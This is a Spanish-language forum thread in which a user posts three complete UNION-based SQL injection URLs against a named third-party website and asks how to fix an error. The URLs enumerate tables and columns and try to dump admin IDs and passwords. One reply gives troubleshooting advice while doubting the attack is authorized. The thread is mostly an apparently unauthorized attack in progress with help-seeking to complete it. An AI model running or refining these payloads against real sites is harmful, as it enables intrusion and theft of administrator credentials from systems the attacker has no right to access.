Problema con inyección SQL

Iniciado por janisorna, 9 Julio 2013, 02:08 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

janisorna

9 Julio 2013, 02:08 AM Ultima modificación: 9 Julio 2013, 02:12 AM por janisorna
Hola a todos!

Estoy haciendo un trabajo sobre vulnerabilidades informáticas i ahora las estoy probando para ver su funcionamiento, he estado haciendo inyección SQL en una web i al principio todo iba perfecto, he podido ver los nombres de las tablas, he encontrado la de admin, he podido ver los nombres de las columnas, pero a la hora de mostrar la información que contiene la tabla me sale este error:

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /nfs/c01/h12/mnt/9330/domains/blamm.com/html/top10.php on line 17

A continuación os dejo los pasos que he seguido para llegar hasta donde estoy, si veis algun error decidmelo porfavorr.

Para ver el nombre de las tablas:

Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.tables+limit+0,1--

Para ver el nombre de las columnas:

Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--

admin = 97,100,109,105,110

I finalmente para ver la información de la tabla (aquí es donde me da error):

Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,group_concat(admin_id,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+admin--

Porfavor ayudadmee!!  ;D

Cleantesdeasso

#1
9 Julio 2013, 05:29 AM
 Leer los campos de a uno. O si es necesario usar group_concat, en lugar de concat a secas... Prueba.  Aunque blamm.com no me suena a "trabajo". No rompas nada, que después te sentirás mal. Y avisa, a no ser que no haya nadie... Bah, haz lo que te plazca, quien soy yo para aconsejar ;)
"Que no!! q el hash hay q crakiarlo!!"

janisorna

#2
11 Julio 2013, 18:44 PM
Ya he probado de hacerlo solo poniendo concat i poniendo gropu_concat pero me sigui dando el mismo error
Imprimir
Ir Arriba Páginas1
Acciones del Usuario